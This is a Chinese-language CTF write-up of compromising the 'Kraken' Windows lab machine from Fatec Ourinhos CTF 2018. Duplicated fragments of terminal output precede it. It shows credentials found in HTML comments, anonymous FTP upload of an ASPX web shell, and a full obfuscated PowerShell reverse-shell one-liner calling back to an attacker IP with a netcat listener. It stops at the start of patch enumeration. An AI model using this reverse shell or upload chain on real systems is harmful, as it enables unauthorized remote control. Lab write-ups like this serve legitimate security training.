介绍
Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-16 14:22 PDT
Nmap scan report for 192.168.56.100
Host is up, received user-set (0.10s latency).
Not shown: 990 filtered ports
Reason: 990 no-responses
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack
80/tcp open http syn-ack
135/tcp open msrpc syn-ack
443/tcp open https syn-ack
1723/tcp open pptp syn-ack
3389/tcp open ms-wbt-server syn-ack
49153/tcp open unknown syn-ack
49154/tcp open unknown syn-ack
49156/tcp open unknown syn-ack
49157/tcp open unknown syn-ack
Nmap done: 1 IP address (1 host up) scanned in 10.73 seconds
![Fatec Ourinhos CTF 2018――Writeup]()
<html>
<body>
<div align="center">
<h1>Release the kraken!</h1>
<img src="kraken-pic.jpg"/>
</div>
<!-- Username: DavyJones -->
<!-- Password: #kr4kud0o0O -->
</body>
</html>
Connected to 192.168.56.100.
220 Microsoft FTP Service
Name (192.168.56.100:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230-Directory has 49,359,065,088 bytes of disk space available.
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
05-17-2018 01:08PM <DIR> kraken
05-17-2018 02:01PM <DIR> uploads
05-17-2018 01:08PM <DIR> App_Data
05-17-2018 11:26AM 189 index.html
05-17-2018 11:21AM 53404 kraken-pic.jpg
226-Directory has 49,359,065,088 bytes of disk space available.
226 Transfer complete.
ftp>
[root:/tmp] ftp 192.168.56.100
Connected to 192.168.56.100.
220 Microsoft FTP Service
Name (192.168.56.100:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230-Directory has 49,354,731,520 bytes of disk space available.
230 User logged in.
Remote system type is Windows_NT.
ftp> put file.txt
local: file.txt remote: file.txt
200 PORT command successful.
550 Access is denied.
ftp>
250 CWD command successful.
ftp> put file.txt
local: file.txt remote: file.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
7 bytes sent in 0.00 secs (175.2805 kB/s)
ftp> exit
221 Goodbye.
[root:/tmp] curl http://192.168.56.100/uploads/file.txt
andre
[root:/tmp]
[root:/tmp] ftp 192.168.56.100
Connected to 192.168.56.100.
220 Microsoft FTP Service
Name (192.168.56.100:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230-Directory has 49,345,097,728 bytes of disk space available.
230 User logged in.
Remote system type is Windows_NT.
ftp> cd uploads
250 CWD command successful.
ftp> put cmdasp.aspx
local: cmdasp.aspx remote: cmdasp.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
1442 bytes sent in 0.00 secs (42.9749 MB/s)
[+] Execute this code in remote target:
powershell.exe -nop -ep bypass -Command "$cFYlLK='10.11.12.26';$BfKleTWqoeSd=443;$czOaNBi=New-Object System.Net.Sockets.TCPClient($cFYlLK,$BfKleTWqoeSd);$QHFXyM=$czOaNBi.GetStream();[byte[]]$xdjeYJjrFCJTTT=0..65535|%{0};$tBoRkCjv=([text.encoding]::ASCII).GetBytes('PS '+(Get-Location).Path+'> ');$QHFXyM.Write($tBoRkCjv,0,$tBoRkCjv.Length);while(($LOlZmTcyLFlYNih=$QHFXyM.Read($xdjeYJjrFCJTTT,0,$xdjeYJjrFCJTTT.Length)) -ne 0){$qLUSJN=([text.encoding]::ASCII).GetString($xdjeYJjrFCJTTT,0,$LOlZmTcyLFlYNih);try{$yWMBwfso=(Invoke-Expression -c $qLUSJN 2>&1|Out-String)}catch{Write-Warning 'Something went wrong with execution of command on the target.';Write-Error $_;};$cFYlLK0=$yWMBwfso+'PS '+(Get-Location).Path+'> ';$cFYlLK1=($cFYlLK2[0]|Out-String);$cFYlLK2.clear();$cFYlLK0=$cFYlLK0+$cFYlLK1;$tBoRkCjv=([text.encoding]::ASCII).GetBytes($cFYlLK0);$QHFXyM.Write($tBoRkCjv,0,$tBoRkCjv.Length);$QHFXyM.Flush();};$czOaNBi.Close();if($cFYlLK3){$cFYlLK3.Stop();};"
[+] This shell DOES NOT have a handler set.
[root:/tmp]# nc -lvp 443
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:49244.
PS C:\windows\system32\inetsrv>
Source Description HotFixID InstalledBy InstalledOn
------ ----------- -------- ----------- -----------
KRAKEN Security Update KB2479943 6/15/2015 ...
KRAKEN Security Update KB2491683 6/15/2015 ..
本文是一篇关于 Fatec Ourinhos CTF 2018 第 2 版挑战赛的 write-up ,我将详细的阐述如何拿到 Kraken 这台机器 flag 。
机器的原名是 Kraken ,是我在 2017 年为我的团队 WATCHERS 搭建的个人渗透测试实验室的一部分。
挑战信息
名称: Unleash the Kraken
我们的目标 IP 地址是 192.168.56.100 ,域名是 kraken.wtc 。
操作系统: windows
枚举扫描阶段Nmap 向我们显示了以下输出内容:
[root:~] nmap 192.168.56.100 -Pn -sTStarting Nmap 7.70 ( https://nmap.org ) at 2018-09-16 14:22 PDT
Nmap scan report for 192.168.56.100
Host is up, received user-set (0.10s latency).
Not shown: 990 filtered ports
Reason: 990 no-responses
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack
80/tcp open http syn-ack
135/tcp open msrpc syn-ack
443/tcp open https syn-ack
1723/tcp open pptp syn-ack
3389/tcp open ms-wbt-server syn-ack
49153/tcp open unknown syn-ack
49154/tcp open unknown syn-ack
49156/tcp open unknown syn-ack
49157/tcp open unknown syn-ack
Nmap done: 1 IP address (1 host up) scanned in 10.73 seconds
很明显,我们有一个网站和一个 FTP 服务器需要渗透测试。其他的服务都需要凭证,但我们没有凭证信息。
这个网站的页面是一张 “ 海妖 (kraken)” 的图片,如下图所示:
让我们启动一个 cURL 请求 http 的服务端口,看看我们能得到了什么信息:
[root:~] curl http://192.168.56.100<html>
<body>
<div align="center">
<h1>Release the kraken!</h1>
<img src="kraken-pic.jpg"/>
</div>
<!-- Username: DavyJones -->
<!-- Password: #kr4kud0o0O -->
</body>
</html>
从网页源码中我们拿到了凭证。尝试登陆 FTP (端口 21 )服务并没有成功,尝试登录 RDP (端口 3389 )服务同样失败了!
漏洞分析
现在,我尝试通过匿名账户 (anonymous) 登录 FTP 竟然成功了!
[root:~] ftp 192.168.56.100Connected to 192.168.56.100.
220 Microsoft FTP Service
Name (192.168.56.100:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230-Directory has 49,359,065,088 bytes of disk space available.
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
05-17-2018 01:08PM <DIR> kraken
05-17-2018 02:01PM <DIR> uploads
05-17-2018 01:08PM <DIR> App_Data
05-17-2018 11:26AM 189 index.html
05-17-2018 11:21AM 53404 kraken-pic.jpg
226-Directory has 49,359,065,088 bytes of disk space available.
226 Transfer complete.
ftp>
我们可以通过 FTP 的匿名账户访问到 Web 根目录,让我们尝试上传文件。
[root:/tmp] echo 'andre' >> file.txt[root:/tmp] ftp 192.168.56.100
Connected to 192.168.56.100.
220 Microsoft FTP Service
Name (192.168.56.100:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230-Directory has 49,354,731,520 bytes of disk space available.
230 User logged in.
Remote system type is Windows_NT.
ftp> put file.txt
local: file.txt remote: file.txt
200 PORT command successful.
550 Access is denied.
ftp>
我们没有权限上传文件。但也许另一个文件夹可以? uploads 这个文件夹本身就是接收文件的,应该是有权限的!
ftp> cd uploads250 CWD command successful.
ftp> put file.txt
local: file.txt remote: file.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
7 bytes sent in 0.00 secs (175.2805 kB/s)
ftp> exit
221 Goodbye.
[root:/tmp] curl http://192.168.56.100/uploads/file.txt
andre
[root:/tmp]
漏洞利用
现在我们知道了一种上传任意文件的方法,并且我们可以使用浏览器访问上传的文件。那么,现在就只是上传个 Web shell 的问题了,因此我们可以在 Kraken 主机上获得一个 shell 。
[root:/tmp] cp /usr/share/webshells/aspx/cmdasp.aspx .[root:/tmp] ftp 192.168.56.100
Connected to 192.168.56.100.
220 Microsoft FTP Service
Name (192.168.56.100:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230-Directory has 49,345,097,728 bytes of disk space available.
230 User logged in.
Remote system type is Windows_NT.
ftp> cd uploads
250 CWD command successful.
ftp> put cmdasp.aspx
local: cmdasp.aspx remote: cmdasp.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
1442 bytes sent in 0.00 secs (42.9749 MB/s)
现在使用 Web 浏览器访问 Webshell 并发送命令!
拿到主机权限为了获得一个 shell ,我使用了我编写的反向 shell 生成器工具 shellpop 来帮助我拿到主机的系统 shell ,如下所示:
[root:/tmp] shellpop --payload windows/reverse/tcp/powershell -H tun0 -P 443[+] Execute this code in remote target:
powershell.exe -nop -ep bypass -Command "$cFYlLK='10.11.12.26';$BfKleTWqoeSd=443;$czOaNBi=New-Object System.Net.Sockets.TCPClient($cFYlLK,$BfKleTWqoeSd);$QHFXyM=$czOaNBi.GetStream();[byte[]]$xdjeYJjrFCJTTT=0..65535|%{0};$tBoRkCjv=([text.encoding]::ASCII).GetBytes('PS '+(Get-Location).Path+'> ');$QHFXyM.Write($tBoRkCjv,0,$tBoRkCjv.Length);while(($LOlZmTcyLFlYNih=$QHFXyM.Read($xdjeYJjrFCJTTT,0,$xdjeYJjrFCJTTT.Length)) -ne 0){$qLUSJN=([text.encoding]::ASCII).GetString($xdjeYJjrFCJTTT,0,$LOlZmTcyLFlYNih);try{$yWMBwfso=(Invoke-Expression -c $qLUSJN 2>&1|Out-String)}catch{Write-Warning 'Something went wrong with execution of command on the target.';Write-Error $_;};$cFYlLK0=$yWMBwfso+'PS '+(Get-Location).Path+'> ';$cFYlLK1=($cFYlLK2[0]|Out-String);$cFYlLK2.clear();$cFYlLK0=$cFYlLK0+$cFYlLK1;$tBoRkCjv=([text.encoding]::ASCII).GetBytes($cFYlLK0);$QHFXyM.Write($tBoRkCjv,0,$tBoRkCjv.Length);$QHFXyM.Flush();};$czOaNBi.Close();if($cFYlLK3){$cFYlLK3.Stop();};"
[+] This shell DOES NOT have a handler set.
[root:/tmp]# nc -lvp 443
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:49244.
PS C:\windows\system32\inetsrv>
现在我们已经拿到了系统 shell 的权限。在此计算机中有多种方法可以拿到 SYSTEM 权限,但这适用于权限提升阶段。
特权提升
如果你在系统信息枚举阶段多花一点时间,你很快就会发现这台机器缺少很多补丁程序。
PS C:\windows\system32\inetsrv> Get-Hotfix | Where-Object { $_.Description -eq "Security Update" }Source Description HotFixID InstalledBy InstalledOn
------ ----------- -------- ----------- -----------
KRAKEN Security Update KB2479943 6/15/2015 ...
KRAKEN Security Update KB2491683 6/15/2015 ..
